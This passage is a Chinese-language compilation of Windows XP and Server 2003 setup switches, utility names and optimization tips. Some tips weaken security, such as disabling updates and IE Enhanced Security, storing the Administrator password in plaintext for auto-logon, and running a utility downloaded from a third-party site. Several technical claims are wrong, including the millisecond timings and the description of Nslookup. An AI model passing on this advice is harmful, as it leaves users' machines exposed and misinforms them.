文件夹)。<BR><BR>/cmd:command_line<BR><BR>指示安装程序在执行最后阶段的安装前,运行一个特殊的命令。这将在计算机重新启动两次并且“安装程序”收集了必要的配置信息后,以及“安装程序”结束之前发生。<BR><BR>/cmdcons<BR><BR>在运行的计算机上将“故障恢复控制台”作为启动选项安装。恢复控制台是一个命令行界面,可以用它执行诸如启动和停止服务以及访问本地驱动器(包括 NTFS 格式的驱动器)这样的任务。只有在常规安装完毕后,才可以使用 /cmdcons 选项。<BR><BR>/copydir:i386folder_name<BR><BR>在安装 Windows XP 文件的文件夹内另外创建一个文件夹。文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如,您可以在安装程序的 i386 源文件夹中创建名为 Private_drivers 的文件夹,用来存放驱动程序文件。然后,您可以键入 /copydir:i386Private_drivers 让安装程序将该文件夹复制到新安装的计算机上,并建立新的文件夹位置 systemrootPrivate_drivers。还可以使用/copydir 命令创建任意多个其他的文件夹。<BR><BR>/copysource:folder_name<BR><BR>在安装 Windows XP 文件的文件夹内另外创建一个临时文件夹。文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如,您可以在安装程序的源文件夹中创建名为 Private_drivers 的文件夹,用来存放驱动程序文件。然后,您可以键入 /copysource:Private_drivers 以使安装程序将该文件夹复制到最新安装的计算机上,并在安装期间使用它的文件,从而建立临时文件夹位置systemrootPrivate_drivers。还可以使用 /copysource 命令创建任意多个其他的文件夹。与 /copydir 创建的文件夹不同,/copysource 创建的文件夹在安装完成后即被删除。<BR><BR><BR><BR>/debug:在指定等级处创建调试日志,例如,/debug4:Debug.log。默认日志文件为:systemrootWinnt32.log,并且默认调试等级为 2。日志等级如下所示:0 -- 严重错误、1 -- 错误、2 -- 警告、3 -- 通知、4 -- 用于调试的详细信息。每个级别都在其下包括一些子级别。<BR><BR><BR>/dudisable<BR><BR>禁用“动态更新”。没有“动态更新”,安装程序仅能在初始安装文件下运行。即使使用应答文件并在该文件中指定“动态更新”选项,该选项仍会禁用“动态更新”。<BR><BR>/dushare:pathname<BR><BR>将以前从 Windows Update 网站下载的“动态更新”文件(更新的文件在安装时使用)的目录指定为共享。当从安装共享处运行并使用 /duprepare 时,该选项将执行准备操作,这样,经过更新的文件才能在基于网络的客户端安装中使用。如果没有使用/duprepare 并且在客户端上运行,则指定客户端安装将使用位于 pathname 所指定的共享位置的更新文件。<BR><BR>/duprepare<BR><BR>进行安装共享准备,使从 Windows Update 网站下载的“动态更新”文件可以使用它。然后,该共享可用于多个客户端的 Windows XP 安装。只能与 /dushare 一起使用。<BR><BR>/m:folder_name<BR><BR>指定“安装程序”从备用位置复制替换文件。指导“安装程序”首先在备用位置中查看,如果有文件显示,则应使用这些文件而非默认位置中的文件。<BR><BR>/makelocalsource<BR><BR>指示安装程序将所有的安装源文件复制到本地硬盘上。当采用从光盘安装时,使用/makelocalsource 可以在以后没有光盘的情况下,为计算机提供安装文件。<BR><BR><BR><BR>/noreboot<BR><BR>指导“安装程序”在结束文件复制阶段之后不重新启动计算机,这样您就可以执行另一个命令。<BR><BR>/s:sourcepath<BR><BR>指定 Windows XP 文件的源位置。要同时从多个服务器复制文件,请多次键入<BR><BR>/s:sourcepath 选项(最多八次)。如果输入多次选项,则所指定的第一个服务器必须是可用的,否则“安装程序”失败。<BR><BR>/syspart:drive_letter<BR><BR>表明可以将安装启动文件复制到一个硬盘上,并将硬盘标记为活动,然后将该磁盘安装到其他计算机上。启动该计算机时,它将自动启动下一阶段的安装。但必须始终同时使用 /tempdrive 参数和 /syspart 参数。在运行 Windows NT 4.0、Windows 2000 或 Windows XP 的计算机上,可以使用/syspart 选项来启动 Winnt32。运行 Windows 95、Windows 98 或 Windows Me 的计算机不能使用该选项。<BR><BR>/tempdrive:drive_letter<BR><BR>指导安装程序将临时文件放置到指定部分。对于全新安装, 可以将 Windows XP 安装在指定的分区。对于升级安装,/tempdrive 选项仅影响临时文件的位置,而操作系统的升级则在运行 winnt32 的分区中进行。<BR><BR>/udf:id [,UDB_file]<BR><BR>指出安装程序用来指定“唯一数据库”(UDB) 文件如何修改应答文件的标识符 (id)(请参阅 /unattend 项)。UDF 会覆盖应答文件中的一些值,且标识符会决定使用 UDF 中的哪些值。例如,/udf:RAS_user,Our_company.udb 会覆盖Our_company.udb 文件中为 RAS_user 标识符指定的一些设置。如果没有指定 UDF_file,安装程序会提示用户插入一张含有Unique.udb 文件的磁盘。<BR><BR>/unattend<BR><BR>以无人参与的安装模式升级 Windows 98 或 Windows Me 以前的版本。因为所有用户设置都可以从上一次安装中获得,所以在安装过程中并不需要用户干预。<BR><BR>/unattend:<BR><BR>在无人参与安装模式下执行干净安装。所指定的应答文件为安装程序提供了您自定义的设置信息。Num 是在安装程序结束复制这些文件与重新启动计算机之间间隔的秒数。在运行Windows 98、Windows Me、Windows NT、Windows 2000 或 Windows XP 的任何计算机上都可以使用 num 选项。如果使用 /unattend 命令行选项来自动完成安装程序,则表示您已经阅读和接受了Windows XP 的 Microsoft 许可协议。在代表某个组织而不是您自己使用该命令行选项来安装 Windows XP 之前,您必须确认最终用户(无论是个人还是单个实体)已经接收、阅读并接受 Windows XP 的 Microsoft 许可协议的条款。OEM 在销售给最终用户的机器上可能不会指定此值。 WIN XP的十八般武艺<BR><BR>Windows XP里有我们常用到的工具如磁盘清理程序等等,那么它们到底叫什么名字,又躲在硬盘的哪个地方呢?笔者这就把它们挖掘出来,以后大家再用这些工具的时候就不用一步一步地去找地方了,直接点击“开始→运行”,再输入程序名就OK了。<BR><BR>1.磁盘清理大师——Cleanmgr<BR><BR>用来自动地释放出一部分硬盘空间,并会智能化地进行删除操作。<BR><BR>2.剪贴板查看器——Clipbrd<BR><BR>Windows XP中的剪贴板查看器程序较原先Windows 9X/Me的旧版本多出了共享功能,通过设置权限允许其他网上用户将该剪贴板装入使用。<BR><BR>3.控制面板启动器——Control<BR><BR>快速启动控制面板。<BR><BR>4.Windows XP的诊断医生——Drwtsn32<BR><BR>Drwtsn32是一个程序错误调试器。运行后会获得并记录系统中程序错误的信息,并创建一个文本文件?drwtsn32.log?,提供错误原因的详细说明,并给出解决问题的建议性操作。<BR><BR>5.DVD播放器——Dvdplay<BR><BR>Windows XP提供的一个“免费”的DVD播放器,也就是Windows Media Player。<BR><BR>6.自解压文件制作工具——Iexpress<BR><BR>利用Iexpress可制作两种自解压文件,一种是标准自解压文件,另一种是安装程序式自解压文件。<BR><BR>7.备份工具——Ntbackup<BR><BR>Windows XP中内置的备份工具。<BR><BR>8.IP地址侦测器——Nslookup<BR><BR>通过这个IP侦测工具ping就可以轻而易举地得到它们的真正IP地址。<BR><BR><BR><BR>9.注册表编辑器增强版——Regedt32<BR><BR>用来修改注册表设置的高级工具。<BR><BR>10.Windows升级程序——Wupdmgr<BR><BR>联上网后,可以通过此程序进行Windows的自动升级。<BR><BR>11.共享文件夹设置工具——Shrpubw<BR><BR>它的作用与右击一文件夹,选择“共享”基本上等价。<BR><BR>12.Microsoft签字验证工具——Sigverif<BR><BR>所谓“签署的文件”,就是被授予Microsoft数字签署的文件。该签署表明,该文件是原始文件的一模一样的副本。通过microsoft签字验证工具,我们可在计算机上查找已签署和未签署的文件,也可查看签署文件的身份验证,以确认该文件还没有被篡改。<BR><BR>13.音量控制程序——Sndvol32<BR><BR>平时双击任务栏上的小喇叭就会出现的音量控制程序。<BR><BR>14.任务管理器——Taskmgr<BR><BR>使用任务管理器可快速查看正在运行的程序的状态,或终止已停止响应的程序,也可以查看CPU和内存使用的情况。<BR><BR>15.远程连接程序——Telnet<BR><BR>Windows自带的纯中文界面的远程连接程序。<BR><BR>16.系统文件检查器——Sfc<BR><BR>使用Windows难免会出现系统文件损坏或丢失的毛病,而如果为了几个小小的文件就去重装系统,又显得稍微麻烦了一些。通过系统文件检查器Sfc.exe,一切都会变得非常简单。<BR><BR>以上16个程序都在系统盘的WINDOWS\SYSTEM32文件夹下。<BR><BR>17.文件转移向导——Migwiz?WINDOWS\SYSTEM32\usmt文件夹下?<BR><BR>通过它,我们就可以实现系统状态的备份与恢复。<BR><BR>18.系统配置程序——Msconfig?windows\pchealth\helpctr\binaries文件夹下?<BR><BR>和Windows中的系统配置程序一样,通过这个程序,我们可对系统的一般、system.ini、win.ini、boot.ini、服务和启动项目进行修改。 WIN XP请不要自作多情<BR><BR><BR>Windows XP已经推出较长一段时间了,相对于以前的操作系统来说它提供了一系列的新功能,但并不是每种新功能都能切实方便广大用户的日常使用,有时候微软的一番好意反而变成了自作多情,比如“错误报告”就是如此,它的本意是要帮助用户解决问题,没想到却给我们带来了不必要的麻烦。还有其他诸如此类的一些功能,如果你不喜欢,就让它们走开吧! <BR><BR>关闭自动更新<BR><BR>用鼠标右键单击“我的电脑”,选择“属性”,进入“自动更新”选项卡,选择“关闭自动更新,我将手动更新计算机。”选项,再单击“确定”按钮即可关闭自动更新功能。<BR><BR>禁止Windows Messenger开机时启动<BR><BR>依次单击“开始→所有程序→Windows Messenger”,在Windows Messenger主界面中选择“工具→选项”,在“首选参数”选项卡中清空“在Windows 启动时运行此程序”前的复选框即可。<BR><BR>禁止Windows Messenger随OE启动<BR><BR>单击“开始→运行”,输入“Regedit”后回车,打开“注册表编辑器”,依次展开 HKEY_CLASSES_ROOT/CLSID/{FB7199AB-79BF-11d2-8D94-0000F875C541}/LocalServer32分支,删除默认键值即可。同样在注册表中,依次展开HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Outlook Express”分支,在窗口右侧新建一个名为“HideMessenger”的DWORD值,然后将其键值设为“2”即可。<BR><BR>当然,最彻底的方法莫过于将Windows Messenger卸载:单击“开始→运行”,输入“Rundll32 advpack.dll,LaunchINFSection windir/INF/msmsgs.inf,BLC.Remove”后回车即可,其中“windir”为Windows XP 的安装目录,如“C:Windows”。<BR><BR>关闭错误报告<BR><BR>打开“系统属性”对话框,切换到“高级”选项卡,然后单击“错误报告”按钮,在弹出的对话框中选中“禁用错误汇报”项(建议同时选中“但在发生严重错误时通知我”复选框)即可关闭错误报告功能。<BR><BR><BR><BR>关闭光驱的自动播放功能<BR><BR>打开“我的电脑”,用鼠标右键单击要禁止自动播放的驱动器盘符,选择“属性→自动播放”,然后在下拉框中先选择光盘的类型,如“音乐文件”,再选择Windows要执行的操作,如“不执行操作”(如图所示),然后单击“应用”按钮。用同样的方法, 我们可以设置向光驱中放入数据光盘、视频光盘、混合光盘等不同类型光盘时光驱自动执行的方法。<BR><BR><BR><BR>删除注册表的自动记忆功能<BR><BR>Windows XP的注册表编辑器具有记忆功能,运行时会自动定位于上次使用注册表时最后打开的键值。虽然该功能在一定程度上方便了我们的使用,但也存在泄露我们秘密的可能性。因此,我们有必要将该功能禁止:<BR><BR>先在任意文件夹中建立一个注册表文件,如ClearLastKey.reg,内容如下:<BR><BR>Windows Registry Editor Version 5.00<BR><BR><BR><BR>"LastKey"=""<BR><BR>接下来在该文件夹中再新建一个文本文件,输入“regedit /s ClearLastKey.reg”,将该文本文件命名为“ClearLastKey.bat”。运行该文件即可删除注册表的位置记录。<BR><BR>上面的办法虽然能够解决问题,但步骤稍多有点麻烦,其实要彻底解决这个问题也很容易,只要我们养成一个好习惯就行了:由于“LastKey”键所记录的是退出注册表时最后一个具有焦点的分支,因此只要我们在退出注册表编辑器前用鼠标点一下最顶层的“我的电脑”即可。这样不管是谁,再打开注册表时都只能看到“我的电脑”了,真干净,呵呵! WIN XP小技巧两则<BR><BR>快速锁定计算机<BR><BR> 如果你因为有急事而需要离开,但又不希望电脑进行系统注销,那该怎么办呢?哈,我们完全可以通 过双击桌面快捷方式来迅速锁定键盘和显示器,而无需使用CTRL+ALT+DEL组合键或屏幕保护程序。首先在桌面上单击鼠标右键,在随后出现的快捷菜单上选择"新建"→"快捷方式",接着系统便会启动创建快捷方式向导,在文本框中输入“rundll32.exe user32.dll,LockWorkStation”,单击“下一步”,在弹出的窗口中输入快捷方式的名称。比如我们可将它命名为"锁定计算机"或选用你所喜欢的任何名称,单击"完成"。此时屏幕上会有一个空白的图标,如果你对图标的样式不满意,我们还可以对快捷方式图标进行修改,右键单击快捷方式,选择"属性",单击"快捷方式"选项卡,点击“更改图标”按钮,在“在这个文件中查找图标”文本框中输入Shell32.dll,单击“确定”,再从列表中选择所需图标,并单击“确定”。怎么样?是不是变得好看多了。<BR><BR> 远程桌面快捷方式<BR><BR> Windows XP提供了功能强大的“远程桌面连接”,通过它我们就可以把在公司未做好的事带回家去完成了。我们可以在家中计算机的桌面上添加一个快捷方式,以便快速启动“远程桌面连接”并与你公司中的计算机建立连接。<BR><BR> 单击“开始”→“程序”→“附件”→“通讯”→“远程桌面连接”,在弹出的窗口中单击“选项”,再配置针对你公司中计算机的连接设置。点击“另存为”,输入名称(如“连接公司”),单击“保存”。再打开刚才保存连接设置的文件夹,在名为“连接公司”的文件上单击鼠标右键。从随后出现的快捷菜单中点击“创建快捷方式”,再把快捷方式拖放到家中计算机的桌面上,如需启动“远程桌面连接”并与你公司中的计算机建立连接,只要双击此快捷方式,一切就OVER了。 WINDOWNS 2003中文版全面优化<BR><BR>1、 缩短等待时间 <BR>打开注册表编辑器,找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control,将 WaitToKillServiceTimeout 设为:4000(原设<BR>定值:20000)。找到 HKEY_CURRENT_USER\Control Panel\Desktop 键,将右边窗口的 WaitToKillAppTimeout 改为 4000(原设定值:<BR>20000),即关闭程序时仅等待1秒。将 HungAppTimeout 值改为:2000(原设定值:5000),表示程序出错时等待0.5秒。 <BR><BR>2、 让系统自动关闭停止响应的程序 <BR>打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键,将 AutoEndTasks 值设为 1(原设定值:0)。 <BR><BR>3、 加速共享查看 <BR>打开注册表编辑器,把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace<BR>下的 {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 删掉 <BR><BR>4、 加快Windows 2003的启动: <BR><BR>(1)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement\PrefetchParameters,其中有一个键值<BR>名为EnablePrefetcher,多数情况下它的值是3,推荐设置值是1.<BR><BR>(2)"我的电脑"->"属性"->"高级"->"启动和故障修复"中,点"错误报告",选择"禁用错误汇报"、"但在发生严重错误时通知我"。 <BR><BR>(3)点击"编辑",在弹出记事本文件中: <BR> <BR> timeout=30 //把缺省时间 30 秒改为 0 秒 <BR><BR>5、优化“启动和故障恢复”设置: <BR>右键单击“我的电脑”,点击属性,点击“高级”,在“启动和故障恢复”<BR>一栏中,点击“设置”,其中的“系统失败”一栏中,只选择“自动重新启动”,写入调试信息选择“无”。 <BR><BR>6、关闭“Internet时间同步”功能: <BR>请依次单击“开始”→“控制面板”→“日期、时间、语言和区域选项”,然后单击“日期和时间”→“Internet时间”。 <BR><BR>7、关闭华医生Dr.Watson: <BR>在"开始"->"运行"中输入"drwtsn32"命令,或者"开始"->"程序"->"附件"->"系统工具"->"系统信息"->"工具"->"Dr Watson",调出系统里的华<BR>医生Dr.Watson ,只保留"转储全部线程上下文"选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,<BR>删除后可节省几十MB空间。 <BR><BR>8、取消对zip文件的支持: <BR>运行,敲入:regsvr32 /u zipfldr.dll 然后回车即可。 <BR><BR>9.windows2003的内存优化!!!!!!!!!!!!(警告!!!!!以下设置需要有256M以上的内存才能有好的效果!!!) <BR>注册表: <BR>HKEK_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management <BR>中的:禁用内存页面调度: DisablePagingExecutive 值改为“1” <BR>提升系统缓存: LargeSystemCache 值改为“1” <BR><BR>10.修改cpu的二级缓存 <BR>在正常情况下,2003会自动识别cpu的二级缓存。但有时2003不会这样做,这样就需要手动优化以改善cpu的 <BR>性能。 <BR>a.)运行"regedit"; <BR>b.)去""; <BR>c.)修改他的十进制: <BR>AMD Duron: 64(kb); <BR> CeleronA/celeron2/3:128; <BR> PII mobile/PIII E(EB)/P4A/AMD K6-3/AMD THUNDERBird/Cyrix III:256; <BR> AMD K6-2/PII/PIII katmai/P4B/AMD Athlon:512; <BR> PII Xeon/PIII Xeon:1024; <BR>e.)重启。 <BR><BR>11.修改磁盘缓存以加速xp <BR>a.)运行 "regedit"; <BR>b.)去; <BR>c.)根据你的内存修改其十六进制值: <BR>64M: 1000; <BR>128M: 4000; <BR>256M: 10000; <BR>512M或更大: 40000. <BR>d.)重启 <BR><BR>12.减少磁盘扫描等待时间 <BR>在dos下,键入“chkntfs/t:0” <BR><BR>13.解除带宽限制 <BR>运行----gpedit.msc-----管理模版-----网络----QoS数据包调度程序---限制可保留带宽---启 <BR><BR>动-----下面输入 0 ----确定---------在你的拨号图标右健属性找到网络-----看看有没有QoS <BR><BR>数据包调度程序-------如果没有点安装-----服务------添加----选QoS数据包调度程序----看 <BR><BR>看有没有打勾----有就代表成功了--------重启---ok! <BR><BR><BR>14使用xp主题<BR>打开控制面板->管理工具->服务,在里面把theme这个服务启动,重启<BR>然后进桌面属性,在桌面主题里面选xp样式,就可以换回熟悉的XP主题!<BR><BR>15.禁用配置服务器向导<BR>由于不需要服务器设置功能,首先我们先禁止“配置你的服务器”向导的出现,你可以在控制面板<BR>-> 管理员工具-> 管理你的服务器 运行它,然后在窗口的左下角复选“登录时不要显示该页”<BR><BR>16.建立一个新的用户账号<BR>打开“开始” -> “运行” -> 键入“lusrmgr.msc ”,你将看到本地用户和组,右键点击左边窗口的“用户”,选择“新用户”.在弹出的对话框中输入账号信息,然后点击“建立”这样你的账号就可用了,当然,你可以选择把你的账号添加到管理员组,右键点击你新建的用户。然后选择“属性” -> <BR>点击“隶属于” -> “添加” -> “高级” -> “现在查找”在查找结果对话框中双击“管理员”,再点击两次“确定”后关闭“本地用户和组”,现在你将可以注销Administrator用户用你自己的账号登录系统。 <BR><BR>17.禁用Internet Explorer Enhanced Security <BR>作为新windows组件出现的IE安全插件--Internet Explorer Enhanced Security默认把你IE安全设置为最高。这样你将在访问站点弹出询问框并对你浏览网页及文件下载做出阻止的行为。我们其实不一定需要这个组件。我们首先禁止询问框的出现,在弹出的对话框中复选”以后不要显示这个信息<BR>然后,我们可以在IE工具选项中自定义设置IE的安全级别。在安全选项卡上拉动滚动条把Internet区域安全设置为中,这个级别将适合大多数人,要是你有特别要求,这个步骤将不适合你。通过对IE安全的设置,你现在安装可以上Sun's Java VM! <BR>当然,你也可以在控制面板--添加程序--添加或删除Windows组件中卸载Internet Explorer Enhanced Security 。 <BR><BR>18.安装Java VM <BR>Windows server 2003没有集成MS Java VM或Sun Java VM,你可以自行下载并安装它。 <BR><BR>19.禁止关机事件跟踪<BR>关机事件跟踪也是Windows server 2003区别于其他工作站系统的一个设置,对于服务器来说这是一个必要的选择,但是对个人用户却没什么用,我们同样可以禁止它。打开开始->“运行” ->输入“gpedit.msc ”,在出现的窗口的左边部分,选择 “计算机配置”-> “管理模板”-> “系统”在右边窗口双击“显示关闭事件跟踪程序”在出现的对话框中选择“禁止”,点击然后“确定”保存后退出。这样,你将看到类似于windows 2000的关机窗口<BR><BR>20.启用硬件和DirectX加速<BR>★硬件加速:桌面点击右键--属性 -> 设置--高级--疑难解答。把该页面的硬件加速滚动条拉到“完全”,点击“确定”保存退出。这期间可能出现一瞬的黑屏是完全正常。<BR><BR>★DirectX加速:打开“开始” -> “运行”,键入“dxdiag”并回车打开“DirectX 诊断工具”,在<BR>“显示”页面,点击DirectDraw, Direct3D and AGP Texture 加速三个按钮启用加速。<BR><BR>21.允许声音加速<BR>如果你使用的是Windows server 2003标准版请从第二步操作,因为标准版已允许声音服务。<BR>★打开“开始” -> “运行”,键入“Services.msc ”,在出现的窗口中找到“Windows Audio”并双击它,然后在启动模式的下拉菜单选择“自动”,并点击“应用” ->“开始” -> “确定”<BR>★打开“开始” -> “运行”,键入“dxdiag”并回车打开“DirectX 诊断工具”,在“Sound”页面,把“声音的硬件加速级别”滚动条拉到“完全加速”。<BR><BR>22.启用桌面主题<BR>也许你对WINDOWS经典的桌面已经感到厌烦的话,你就要考虑启用桌面主题了,Windows server 2003默认是关闭此服务的。打开“开始” -> “运行”,键入“Services.msc ”,在出现的窗口寻找Services.msc并双击它, 然后在启动模式的下拉菜单选择“自动”,并点击“应用” ->“开始” -> “确定”。<BR>这样的操作也是只能让你使用Windows自带的Luna主题的三个模式,假如你希望使用更多的第三方主题文件的话,你需要使用修改的Uxtheme.dll文件来支持它,关于修改的Uxtheme.dll文件,你可以在 <a href="http://vortex.winbeta.org/" target="_blank" >http://vortex.winbeta.org/</A> 找到更多。<BR><BR>23.允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务<BR>★假如你希望启用Windows内置的IMAPI CD-Burning服务。做如下操作:<BR>打开“开始” -> “运行”,键入“Services.msc ”,在出现的窗口中找到“IMAPI CD-Burning COM Service ”并双击它,然后在启动模式的下拉菜单选择“自动”,并点击“应用” ->“开始” -“确定”<BR>★假如你有如数码相机和扫描仪之类的影像设备,你应该打开Windows Image Acquisition 服务。<BR>打开“开始”-> “运行”,键入“Services.msc ”,在出现的窗口中找到“Windows Image Acquisition (WIA) ”并双击它,然后在启动模式的下拉菜单选择“自动”,并点击“应用” ->“开始”-> “确定”<BR><BR>24.高级设置<BR>★右键点击“我的电脑”--属性--高级--性能--设置--高级,把“处理器计划”和内存使用分配给“程序”使用,然后点击“确定”。<BR><BR>25.自动登陆 <BR>Windows Server 2003默认是使用"CTRL-ATL-DEL to login" 对话框来登陆Windows的,不过我们我们可以使用Windows XP的Tweak UI来使Server 2003自动登陆。 <BR>下载:Tweak UI <a href="http://www.ssite.org/uppic/sun_pic/microsoft/server2003/tweakui.exe" target="_blank" >http://www.ssite.org/uppic/sun_pic/microsoft/server2003/tweakui.exe</A><BR>下载后直接执行tweakui.exe <BR>在左边的面板中选择Logon -> Autologon -> 在右边勾选Log on automatically at system startup输入你的用户名和域名(如果没有就不写) <BR>点击下面的Set Password,输入用户名的密码,然后点击OK。 <BR>虽然同样的功能通过修改注册表也能完成,但是修改注册表的方法密码在注册表中表现的是明文,而Tweak UI在注册表中不会留下明文的密码,所以推荐使用Tweak UI来完成这项工作。 <BR><BR>26.安装DirectX 9a <BR>在Windows Server 2003上安装DirectX 9a和在其他版本的Windows上安装DirectX 9a的方法是一样的。安装之前先启用DirectX and Graphics Acceleration。 安装完成后重启。<BR><BR>27.设置虚拟内存<BR>我的电脑---高级----设置----性能选项-----高级-----虚拟内存-----更改-----选择驱动器(最好选在不怎么使用的分区)-------自定义大小(物理内存不大于256M时,设为物理内存的2倍,最大和最小都一样;物理内存不小于512M时,设为物理内存的1.5倍,最大和最小都一样)确定,重启。<BR><BR><BR>28.把Internet Explorer的临时文件设到不常使用的分区-----工具---Internet选项----Internet临时文件-----设置------移动文件夹----选择路径----确定<BR><BR>29.装2003的分区最好别再装其他应用软件,这样系统盘不易产生碎片;每周整理一次文件碎片<BR><BR>30.对windows优化大师有信心的,可以使用最新版5.4进行一些优化;最好每隔几天就用优化大师清理一下注册表<BR><BR>31.杀毒软件可用诺顿8.0或8.1企业版;KV2003,我已测试均能正常运行 WINDOWS2003优化小贴士<BR><BR>1.禁用配置服务器向导<BR>禁止“配置你的服务器”(Manage Your Server)向导的出现:在控制面板(Control Panel) -> 管理员工具(Administrative Tools )-> 管理你的服务器(Manage Your Server)运行它,然后在窗口的左下角复选“<BR><BR>登录时不要显示该页”(Don't display this page at logon)。<BR><BR>2.禁用Internet Explorer Enhanced Security 和禁止安全询问框的出现<BR>在IE工具选项中自定义设置IE的安全级别。在”安全“(Security)选项卡上拉动滚动条把Internet区域安全设置为”中“(Medium)或“中低”。自定义设置中将有关的选择“提示”修改为选择“禁止”或“启用”。<BR><BR>3.禁用关机事件跟踪<BR>开始 -> 运行 -> gpedit.msc -> Computer configuration -> Administrative Templates -> System -> Display shutdown event tracker -> 设置为 Disable。<BR>如果是中文版,则:开始 -> 运行 -> gpedit.msc->计算机配置 -> 管理模板 -> 系统 -> 显示关机事件跟踪 -> 禁用。 <BR><BR>4. 禁用开机 CTRL+ALT+DEL和实现自动登陆<BR>方法1:打开注册表(运行->“Regedit”),再打开:<BR>HKEY_LOCAL_MACHIN|SOFTWARE|MicroSoft|Windows NT|CurrentVersion |Winlogon段,在此段中按右键,新建二个字符串段,AutoAdminLogon=“1”,DefaultPassword=“为超级用户Administrator所设置的Password”。 <BR>注意,一定要为Administrator设置一个密码,否则不能实现自启动。 然后,重新启动Windows即可实现自动登录。<BR>方法2:管理工具 -> Local Security Settings(本地安全策略) -> 本地策略 -> 安全选项 -> interactive logon: Do not require CTRL+ALT+DEL,启用之。<BR>方法3(自动登陆):使用Windows XP的Tweak UI来实现Server 2003自动登陆。<BR>下载:Tweak UI <a href="http://www.ssite.org/uppic/sun_pic/...003/tweakui.exe" target="_blank" >http://www.ssite.org/uppic/sun_pic/...003/tweakui.exe</A> <BR>下载后直接执行tweakui.exe 在左边的面板中选择Logon -> Autologon -> 在右边勾选Log on automatically at system startup输入你的用户名和域名(如果没有就不写),点击下面的Set Password,输入用户名的密码,然后点击OK。<BR><BR>5.启用硬件和DirectX加速<BR>★硬件加速:桌面点击右键--属性(Properties) -> 设置(Settings )--高级( Advanced )--疑难解答(Troubleshoot)。把该页面的硬件加速滚动条拉到“完全”( Full),最好点击“确定”(OK)保存退出。这期间可能出现一瞬的黑屏是完全正常。<BR><BR>★DirectX加速:打开“开始”(Start) -> “运行”(Run),键入“dxdiag”并回车打开“DirectX 诊断工具”(DirectX Tools),在“显示”(Display)页面,点击DirectDraw, Direct3D and AGP Texture 加速三个按钮启用加速。把“声音的硬件加速级别”(Hardware Sound Acceleration Level)滚动条拉到“完全加速”( Full Acceleration)。<BR><BR>6.启用桌面主题和隐藏文件 <BR>打开“开始”(Start) -> “运行”(Run),键入“Services.msc ”,选themes“主题”(默认是禁止的),然后改为“自动”,按“应用”,选“开启”。接着点“桌面”的属性,在“主题”里选“windows xp”Windows Server 2003默认显示所有的文件夹,如果可以通过以下方法来隐藏:打开任意一个文件夹,选择“工具” -> “文件夹选项” -> “查看”,选择“不显示隐藏的文件和文件夹”,点击“确定”。<BR><BR>7.允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务<BR>★启用Windows内置的IMAPI CD-Burning服务:打开“开始”(Start) -> “运行”(Run),键入“Services.msc ”,在出现的窗口中找到“IMAPI CD-Burning COM Service ”并双击它,然后在启动模式(startup type )的下拉菜单选择“自动”(Automatic),并点击“应用”(Apply) ->“开始”(Start) -> “确定”(OK)<BR><BR>★假如你有如数码相机和扫描仪之类的影像设备,应该打开Windows Image Acquisition 服务。<BR>打开“开始”(Start) -> “运行”(Run),键入“Services.msc ”,在出现的窗口中找到“Windows Image Acquisition (WIA) ”并双击它,然后在启动模式(startup type )的下拉菜单选择“自动”(Automatic),并点击“应用”(Apply) ->“开始”(Start) -> “确定”(OK)<BR><BR>8.高级设置<BR>★禁用错误报告<BR>右键点击“我的电脑”(My Computer)--属性(Properties)--高级(Advanced)--点击“错误报告”(Error Reporting )按钮,在出现的窗口中把“禁用错误报告”(Disable Error Reporting)选上并复选“但在发生严重错误时通知我”(But, notify me when critical errors occur.)<BR><BR>★调整虚拟内存<BR>一些朋友经常会对关机和注销缓慢感到束手无策,解决办法就是禁用虚拟内存,这样你的注销和关机时间可能会加快很多。右键点击“我的电脑”(My Computer)--属性(Properties)--高级(Advanced)--性能(Performance)--设置(Setting)--高级(Advanced),点击“虚拟内存”(Virtual memory)部分的“更改”(Change),然后在出现的窗口选择“无分页文件”。重启系统即可。<BR><BR>9.加快启动和运行速度<BR><BR>**修改注册表,减少预读取,减少进度条等待时间:开始→运行→regedit启动注册表编辑器,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session <BR>Manager\Memory Management\PrefetchParameters, 有一个键值名为EnablePrefetcher,它的值是3,把它改为“1”或“5”。<BR>找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control, <BR>将 WaitToKillServiceTimeout 设为:1000或更小。 ( 原设定值:20000 ) <BR>找到 HKEY_CURRENT_USER\Control Panel\Desktop 键,将右边视窗的WaitToKillAppTimeout 改为 1000, ( 原设定值:20000 )即关闭程序时仅等待1秒。<BR>将 HungAppTimeout 值改为:200( 原设定值:5000 ), 表示程序出错时等待0.5秒。 <BR><BR>**让系统自动关闭停止回应的程式。 <BR>打开注册表 HKEY_CURRENT_USER\Control Panel\Desktop 键, <BR>将 AutoEndTasks 值设为 1。 ( 原设定值:0 ) <BR><BR>**禁用系统服务Qos<BR>开始菜单→运行→键入 gpedit.msc ,出现“组策略”窗口, 展开 "管理模板”→“网络” , 展开 "QoS 数据包调度程序", 在右边窗右键单击“限制可保留带宽" ,在属性中的“设置”中有“限制可保留带宽" ,选择“已禁用”,确定即可。当上述修改完成并应用后,用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler(QoS 数据包调度程序)"。说明修改成功,否则说明修改失败。<BR><BR>**改变窗口弹出的速度: <BR>找到HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics子键分支,在右边的窗口中找到MinAniMate键值,其类型为REG_SZ,默认情况下此健值的值为1,表示打开窗口显示的动画,把它改为0,则禁止动画显示,接下来从开始菜单中选择“注销”命令,激活刚才所作的修改。 <BR><BR> **禁止Windows XP的压缩功能: <BR>点击“开始”下的“运行”,在“运行”输入框中输入“regsvr32/u zipfldr.dll”,然后按回车键即可。 <BR><BR> **设置个性的启动信息或警告信息: <BR>个性化的Windows XP启动:打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 